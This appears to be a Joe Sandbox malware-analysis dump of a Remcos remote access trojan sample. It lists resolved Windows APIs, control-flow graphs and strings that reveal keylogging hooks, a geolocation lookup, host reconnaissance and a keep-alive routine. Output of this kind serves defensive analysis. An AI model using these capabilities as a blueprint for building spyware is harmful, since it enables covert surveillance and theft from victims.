                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                          • API String ID: 4236061018-3687161714
                                          • Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                          • Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
                                          • Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                          • Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 98 40ec27-40ec3d call 401fab call 4139e4 80->98 90 40ec47-40ec49 81->90 91 40ec4e-40ec55 81->91 94 40ef2c 90->94 95 40ec57 91->95 96 40ec59-40ec65 call 41b354 91->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 98->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 128 40ecc6 call 407790 107->128 129 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->129 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 141 40ec9c-40eca2 120->141 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 128->129 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 129->177 178 40edbb-40edbf 129->178 141->107 144 40eca4-40ecaa 141->144 144->107 147 40ecac call 40729b 144->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 192 40ee59-40ee7d call 40247c call 434829 184->192 185->192 212 40ee8c 192->212 213 40ee7f-40ee8a call 436f10 192->213 205->178 215 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->215 213->215 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 215->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 290 40f01b-40f01d 287->290 291 40f01f 287->291 289 40effe-40f015 call 41ce2c CreateThread 288->289 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                          APIs
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000104), ref: 0040EA29
                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                          • String ID: (TG$,aF$,aF$Access Level: $Administrator$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$Exe$Exe$HSG$HSG$Inj$Remcos Agent initialized$Rmc-8AGIM5$Software\$User$del$del$exepath$licence$license_code.txt$pd$tMG$RG$RG$RG$RG$RG
                                          • API String ID: 2830904901-2287637627
                                          • Opcode ID: f976f17ee8bb52e0d4b82a9473b60eebd4c4dbdb3f227a753039268697e419d9
                                          • Instruction ID: 744eeac4272eceb7f63ef51a6efbfa797c3f505d1bd04c543663c5f487e0f2b9
                                          • Opcode Fuzzy Hash: f976f17ee8bb52e0d4b82a9473b60eebd4c4dbdb3f227a753039268697e419d9
                                          • Instruction Fuzzy Hash: 7D32D860B043416BDA14B7729C57B6E26994F80748F40483FB9467F2E3EEBD8D45839E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1260 40a2f3-40a30a 1261 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1260->1261 1262 40a36e-40a37e GetMessageA 1260->1262 1261->1262 1263 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1261->1263 1264 40a380-40a398 TranslateMessage DispatchMessageA 1262->1264 1265 40a39a 1262->1265 1266 40a39c-40a3a1 1263->1266 1264->1262 1264->1265 1265->1266
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                          • GetLastError.KERNEL32 ref: 0040A328
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                          • TranslateMessage.USER32(?), ref: 0040A385
                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                          Strings
                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                          • String ID: Keylogger initialization failure: error
                                          • API String ID: 3219506041-952744263
                                          • Opcode ID: ec6ea0f8fe23a749d8e8acf9f7cc52a99e5dbd3939ef256a600925548c7b7f6b
                                          • Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                          • Opcode Fuzzy Hash: ec6ea0f8fe23a749d8e8acf9f7cc52a99e5dbd3939ef256a600925548c7b7f6b
                                          • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475300), ref: 004135C2
                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                          • ExitProcess.KERNEL32 ref: 0040F905
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                          • String ID: 5.2.0 Pro$override$pth_unenc$RG
                                          • API String ID: 2281282204-1448307011
                                          • Opcode ID: 3c03a218c075b6ec39c216bc398aa57ef6cd9b47273f335186667c9805b65560
                                          • Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
                                          • Opcode Fuzzy Hash: 3c03a218c075b6ec39c216bc398aa57ef6cd9b47273f335186667c9805b65560
                                          • Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1351 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1356 41b456-41b477 InternetReadFile 1351->1356 1357 41b479-41b499 call 4020b7 call 403376 call 401fd8 1356->1357 1358 41b49d-41b4a0 1356->1358 1357->1358 1360 41b4a2-41b4a4 1358->1360 1361 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1358->1361 1360->1356 1360->1361 1365 41b4b8-41b4c2 1361->1365
                                          APIs
                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                          Strings
                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleOpen$FileRead
                                          • String ID: http://geoplugin.net/json.gp
                                          • API String ID: 3121278467-91888290
                                          • Opcode ID: f8b7b88f44e13cfdc63bd17292d54b3b7b9fb09318b10958e004bbca1d27f117
                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                          • Opcode Fuzzy Hash: f8b7b88f44e13cfdc63bd17292d54b3b7b9fb09318b10958e004bbca1d27f117
                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                          APIs
                                          • GetLocalTime.KERNEL32(00000001,00474EF0,004755A8,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF0,004755A8,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$EventLocalThreadTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 2532271599-1507639952
                                          • Opcode ID: 066d78ba7818bee30ed95e00d6410b7cbfa006029d83974b6d81b45a693dc474
                                          • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                          • Opcode Fuzzy Hash: 066d78ba7818bee30ed95e00d6410b7cbfa006029d83974b6d81b45a693dc474
                                          • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,006448A8), ref: 004338DA
                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$Context$AcquireRandomRelease
                                          • String ID:
                                          • API String ID: 1815803762-0
                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750F4), ref: 0041B6BB
                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Name$ComputerUser
                                          • String ID:
                                          • API String ID: 4229901323-0
                                          • Opcode ID: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                          • Instruction ID: 96a0ba9ffe47efa01ac310f3847ceb2d7b3b0148e4494d8e74ae155582b6cc75
                                          • Opcode Fuzzy Hash: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                          • Instruction Fuzzy Hash: 9E014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E888BA8
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,hd,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 4f66370edde0bdaa3bcc008f8ea5ce22c00289683c96eec7ff0f1ed7c7935faa
                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                          • Opcode Fuzzy Hash: 4f66370edde0bdaa3bcc008f8ea5ce22c00289683c96eec7ff0f1ed7c7935faa
